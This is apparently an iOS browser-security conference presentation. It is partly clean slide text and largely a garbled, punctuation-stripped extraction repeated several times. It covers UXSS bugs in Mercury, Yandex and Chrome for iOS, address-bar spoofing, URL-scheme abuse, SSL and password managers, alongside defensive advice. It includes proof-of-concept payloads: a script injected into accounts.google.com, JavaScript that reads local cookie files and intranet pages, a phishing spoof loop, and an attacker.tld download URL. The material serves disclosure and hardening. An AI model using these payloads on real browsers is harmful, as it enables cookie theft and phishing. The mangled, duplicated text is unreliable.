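    if (url == nil) return nil;                     // refuse; do not crash or fall back to nil
    [tab.webView loadRequest:[NSURLRequest requestWithURL:url]];
    return tab;
}

// Native side of w.document.write(html) issued from `source` against `target`.
// The same-origin check runs now, against what `target` has loaded at write
// time (it may have been redirected since window.open()), not once at open.
// The written document gets an inert about:blank base, never nil and never
// the target's URL, so it runs neither as the target origin nor as applewebdata:.
- (BOOL)tab:(BRSTab *)source documentWriteInTab:(BRSTab *)target html:(NSString *)html {
    BOOL allowed;
    if (!target.navigated) {
        allowed = (target.opener == source);        // fresh about:blank child of the caller
    } else {
        NSString *s = BRSOriginOfTab(source), *t = BRSOriginOfTab(target);
        allowed = (s != nil && t != nil && [s isEqualToString:t]);
    }
    if (!allowed) return NO;
    [target.webView loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}

@end
```

Pages that legitimately expect the written child document to share their origin lose that here; the about:blank base the slides recommend trades that feature for an inert origin.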
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">

SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 1/4 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with the privileges of the top frame -> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
